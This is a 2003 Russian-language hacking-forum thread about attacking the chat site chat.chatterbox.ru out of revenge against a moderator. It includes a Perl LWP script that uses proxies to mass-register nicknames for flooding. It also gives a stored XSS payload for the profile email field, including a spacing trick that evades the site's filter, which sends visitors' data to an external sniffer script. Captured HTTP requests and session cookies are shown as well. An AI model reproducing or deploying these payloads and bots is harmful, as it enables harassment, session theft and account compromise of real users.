Предистория: Грязный модер по прозвищу АкБарс появляющийся в чате орентировочно с 23 до 2 учинил со сной экзекуцию, которой я не заслуживал, на что я пожаловался админу чата ROSTу, не получив определенного ответа, а так же не услышав извинений в свой адрес задался целью насолить (как и многие из здесь собравшихся). На данном этапе пишу скрипт авторегистрации. Не важно помогут мне или нет я его НАПИШУ (тем более, что мне интересен этот процесс как программисту, возможно в дальнейшем я подарю его Августу, но снечала они утонут в море новых ников - флудеров). Смысл скрипта - зарегить море ников и с промежутками в 10 минут заходить под случайным ником и флудить. Затем меняем прокси запускаем нового случайного (важно чтобы они были зарегены в разные дни)..... За основу взял перл с библиотекой LWP - библиотека для доступа к WWW из Perl. Может кто подскажет кто какими средствами пользуется Инеткрак не сохраняет кукесы (а может я просто не знаю? или кукесы сохраняются обычнм путем?), а они используют отправку куке для открытия сесии ПХП регистрации. Может кто знает особенности их скрипта? Почему то не смог с помощью ИнетКрак зарегить ни одного пользователя постоянно выбрасывает на первую страницу. Причем похожая картина наблюдалась в ИЕ в тот момент, когда я отключил куки вообще. Пробовал брать кук ПХП с ответа сервера - не помогет. Вобщем жду любой помощи. Флейм не приветствуется
InetCrack поддерживает отправку кукисов. А не получается зарегить еще одного пользователя вероятно из-за того, что ты используешь старый номер сессии, с которого уже была произведена регистрация. А для новой регистрации нужно сначала получить новый номер сессии. (да и кстати этот чат ломается через мыло в инфе юзеров)
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ апреля 25 2003,23:39)</td></tr><tr><td id="QUOTE">InetCrack поддерживает отправку кукисов (да и кстати этот чат ломается через мыло в инфе юзеров)[/QUOTE]<span id='postcolor'> спасибо за оперативность ) очень рад, что здесь такие гостеприимные админы ) Можно про мыло в мыло [email protected] поподробнее.
Номер сесии я указвал новый после первого запроса </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">GET http://chat.chatterbox.ru/people/form HTTP/1.0 Accept: */* Accept-Language: ru Cookie: hotlog=1; b=b User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2) Host: chat.chatterbox.ru Proxy-Connection: Keep-Alive [/QUOTE]<span id='postcolor'> пришел куке </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE"> Set-Cookie: PHPSESSID=839c0f351709dda12a49e10f15a8bff2; path=/ [/QUOTE]<span id='postcolor'> Именно его я указал в последующем Кстати. На поминание о забытом пароле по майл - отключено (видимо в настройках)
У меня кук по этому запросу (GET http://chat.chatterbox.ru/people/form HTTP/1.0) не устанавливается. Он устанавливается где-то ранее. В любом случае, как говорил мой знакомый, идеализма не бывает Если что-то не получается, значит неправильно делаешь. Сравнивай запросы браузера и запросы инетКрека.Ищи различия. Возможно чат требует что бы были пройдены все странички заполнения инфы, а не только последняя (которую ты и пытаешся запостить, я так понимаю) Касаемо взлома через мыло - посмотри на мою инфу в чате (на ник Algol) и сам все увидишь
Без проблем ... собственно даже отправлять никуда не нужно, просто пишешь background:url(document.all[28].innreText) А в соответствующем поле указываешь адрес картинки снифера. Ну конечно можно еще поизвращаться что бы скрыть левые надписи в инфе, но это уже тонкости.
Прости за ламерство, но потратил пол дня на прочтение инфы. Видно подставлять в поле Mail нужно видоизмененную строчку </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">``style=`background:url(javascript: navigate(document.all[28].innerText));`[/QUOTE]<span id='postcolor'> так как прямое копирование не помогло (
Получил таки куку с этой странички. помог метод ignore_discard: - сохранять даже файлы cookie, которые должны быть уничтожены (логический параметр) </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">use LWP::UserAgent; use HTTP::Cookies; $ua = LWP::UserAgent->new; $ua->cookie_jar(HTTP::Cookies->new(file => "lwpcookies.txt", autosave => 1, ignore_discard => 1)); $ua->agent("Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" $ua->proxy(['http', 'ftp'] => 'http://161.53.73.251:80/' $req = HTTP::Request->new('GET',"http://chat.chatterbox.ru/people/form"); $res = $ua->request($req); print $res->content if $res->is_success;[/QUOTE]<span id='postcolor'> Получена сесия ИД: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">#LWP-Cookies-1.0 Set-Cookie3: PHPSESSID=3852bde9e0061a3f2e121da9fc44a9d0; path="/"; domain="chat.chatterbox.ru"; path_spec; discard; version=0[/QUOTE]<span id='postcolor'> Эта зараза сразу отправляет второй запрос и тут же удаляет кук </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">GET http://chat.chatterbox.ru/people/css.php HTTP/1.0 Accept: */* Referer: http://chat.chatterbox.ru/people/form Accept-Language: ru Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2) Host: chat.chatterbox.ru Cookie: PHPSESSID=3852bde9e0061a3f2e121da9fc44a9d0[/QUOTE]<span id='postcolor'>
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (1234567 @ апреля 26 2003,12:10)</td></tr><tr><td id="QUOTE">Прости за ламерство, но потратил пол дня на прочтение инфы. Видно подставлять в поле Mail нужно видоизмененную строчку </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">``style=`background:url(javascript: navigate(document.all[28].innerText));`[/QUOTE]<span id='postcolor'> так как прямое копирование не помогло ([/QUOTE]<span id='postcolor'> Прямое копирование не помогло, поскольку я забыл сказать об одной тонкости (вернее я думал ты сам ее заметишь): Г-н автор чата видимо тоже не полный ламер, и наверно седьмым чувством почувстовал что в поле email-а содержится опсаность, и потому, если строчка длинная, вставляет туда один пробел, разбивая строку и нарушая таким образом синтаксис жабаскрипта. А может это просто глюк чата. В любом случае нужно писать скрипт так, что бы этот пробел вставился в такое место, где он не нарушит синтаксис. Поэтому в моем примере между словом javascript: и словом naviagte должно быть ровно 6 пробелов. Тогда чат вставит еще свой 7-й пробел прямо перед словом navigate и синтаскис останется верным ))).
Насчет куков. Я удалил куки с машины , и потом зашел по http://chat.chatterbox.ru/people/form . В результате чат прислал таки кук (что и логично, ведь на каком то этапе должен же он его прислать) </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> HTTP/1.0 200 OK Date: Sat, 26 Apr 2003 16:34:44 GMT Server: Apache/1.3.27 (Unix) PHP/4.2.3 Content-Location: form.php Vary: negotiate TCN: choice X-Powered-By: PHP/4.2.3 Expires: Thu, 19 Nov 1981 08:52:00 GMT RemovedHeader: Sat, 26 Apr 2003 16:34:44 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=d85e733d92ad3060d49e0917ab463caa; path=/ RemovedHdr: close Content-Type: text/html; charset=windows-1251 [/QUOTE]<span id='postcolor'> Тут конечно какая-то тонкая игра с куками происходит, поскольку вот эти все параметры RemovedHeader: , RemovedHdr: close мне не нравятся, и вообще я не знаю для чего они собственно предназначены. Но во всяком случае ясно что если запрос уже содержит кук, то он не присылается, а если кука нет, то генерится новый номер сессии и устанавливается новый кук. поэтому в ответ на такой запрос </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> GET http://chat.chatterbox.ru/people/form HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */* Accept-Language: uk Proxy-Connection: Keep-Alive If-Modified-Since: Mon, 25 Apr 1983 20:37:04 GMT; length=6000 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705) Host: chat.chatterbox.ru [/QUOTE]<span id='postcolor'> всегда будет приходить новый номер сессии. Касаемо подгружаемого затем CSS.PHP то думаю этот запрос уже с куками ничего не делает. Это просто стили...
С никами я разобрался, кроме сего прочего не http стоит ограничение - 40 так что получилось без метки -http://www.hackzone.ru/cgi-bin/sniff.cgi, переход получился только со страницы Люди в чате, из самого чата по кнопке i переход не происходит. css.php отключил - потерял стиль, но ник зарегился. Буду двигатся дальше. Спасибо за помощь
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (1234567 @ апреля 26 2003,23:47)</td></tr><tr><td id="QUOTE">переход получился только со страницы Люди в чате, из самого чата по кнопке i переход не происходит.[/QUOTE]<span id='postcolor'> вот здесь ты ошибаешся. Просто отбражение твоей собственной инфы происходит по другому чем у других чатлан. У других скрипт сработает.
